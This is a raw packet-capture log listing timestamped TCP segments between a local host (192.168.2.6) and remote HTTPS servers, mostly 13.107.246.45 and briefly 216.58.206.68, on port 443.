                                                                                                                                                                      Nov 21, 2024 06:23:46.252466917 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.252749920 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.253294945 CET49781443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.253308058 CET4434978113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.255655050 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.255696058 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.255767107 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.255912066 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.255929947 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.328881025 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.328952074 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.329026937 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.329233885 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.329250097 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.329268932 CET49782443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.329274893 CET4434978213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.331669092 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.331743002 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.331826925 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.332041025 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.332072020 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.430356979 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.430414915 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.430558920 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.430900097 CET49783443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.430918932 CET4434978313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.434776068 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.434815884 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.434869051 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.436155081 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.436170101 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.755727053 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.756383896 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.756448030 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.756814003 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.756827116 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.824950933 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.826730967 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.826755047 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:46.827205896 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:46.827210903 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.208002090 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.208065987 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.208129883 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.208338976 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.208338976 CET49785443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.208393097 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.208420038 CET4434978513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.211007118 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.211045980 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.211160898 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.211334944 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.211342096 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.269963026 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.270039082 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.270090103 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.270286083 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.270303011 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.270313025 CET49784443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.270318985 CET4434978413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.273622990 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.273658037 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:47.273737907 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.273889065 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:47.273895025 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.011992931 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.055962086 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.115928888 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.165384054 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.196400881 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.243470907 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.503741026 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.503782988 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.504293919 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.504300117 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.510221958 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.510272980 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.510726929 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.510740042 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.510972023 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.510998964 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.511379004 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.511384010 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.819935083 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.820291042 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.820348978 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.827831030 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.828015089 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.828078032 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.840791941 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.842408895 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.842487097 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.843061924 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.843080997 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.843091965 CET49786443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.843106031 CET4434978613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.867182016 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.867197990 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.867208004 CET49788443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.867213964 CET4434978813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.891522884 CET49787443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.891565084 CET4434978713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.920439005 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.920485020 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.920712948 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.920850039 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.920886040 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.921506882 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.921520948 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.921545029 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.921850920 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.921866894 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.922051907 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.922108889 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.922178984 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.922642946 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.922676086 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.990803957 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.995954990 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.995973110 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:48.996402025 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:48.996407986 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.058048010 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.058712959 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.058743000 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.059274912 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.059281111 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.439250946 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.439311028 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.439409018 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.442301035 CET49789443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.442326069 CET4434978913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.446405888 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.446464062 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.446551085 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.446702003 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.446724892 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.503160954 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.503237963 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.503303051 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.503454924 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.503473997 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.503498077 CET49790443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.503504038 CET4434979013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.506463051 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.506489992 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:49.506709099 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.506828070 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:49.506856918 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.648015976 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.649502993 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.675946951 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.675981045 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.676664114 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.676668882 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.677207947 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.677288055 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.677678108 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.677691936 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.769165039 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.769638062 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.769669056 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:50.770299911 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:50.770304918 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.083479881 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.083539963 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.083753109 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.084227085 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.084245920 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.084256887 CET49791443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.084263086 CET4434979113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.089637041 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.089720011 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.089883089 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.090698957 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.090732098 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.113281965 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.113348961 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.113409996 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.113655090 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.113702059 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.113732100 CET49793443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.113749981 CET4434979313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.119374037 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.119452000 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.119546890 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.119868994 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.119903088 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.220210075 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.221259117 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.221276999 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.222209930 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.222218037 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.225786924 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.225949049 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.226059914 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.226094007 CET49792443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.226109982 CET4434979213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.231733084 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.231813908 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.231904984 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.232057095 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.232090950 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.302180052 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.302872896 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.302896976 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.303579092 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.303590059 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.656395912 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.656476021 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.656626940 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.656892061 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.656909943 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.656929970 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.656935930 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.659327030 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.659352064 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.659539938 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.659732103 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.659745932 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.745863914 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.745944023 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.746124029 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.746181965 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.746181965 CET49802443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.746200085 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.746210098 CET4434980213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.748883009 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.748904943 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:51.748967886 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.749147892 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:51.749162912 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.795027971 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:52.795047998 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.795239925 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:52.795522928 CET49812443192.168.2.6216.58.206.68
                                                                                                                                                                      Nov 21, 2024 06:23:52.795535088 CET44349812216.58.206.68192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.839426994 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.839905024 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.839926004 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.840464115 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.840470076 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.869740009 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.870228052 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.870285988 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.870661020 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.870678902 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.952725887 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.953253984 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.953342915 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:52.953695059 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:52.953710079 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.274107933 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.274199963 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.274291039 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.274466038 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.274490118 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.274502993 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.274509907 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.277363062 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.277388096 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.277496099 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.277633905 CET49813443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.277651072 CET4434981313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.312777042 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.312854052 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.312937975 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.313123941 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.313158989 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.313193083 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.313209057 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.315834045 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.315885067 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.315953970 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.316204071 CET49814443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.316234112 CET4434981413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.388797998 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.388962030 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.389035940 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.389415979 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.389415979 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.389450073 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.389477015 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.392256021 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.392294884 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.392469883 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.392616034 CET49817443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.392632008 CET4434981713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.474102974 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.474611998 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.474634886 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.475369930 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.475374937 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.529278040 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:53.532540083 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:53.532561064 CET4434981013.107.246.45192.168.2.6
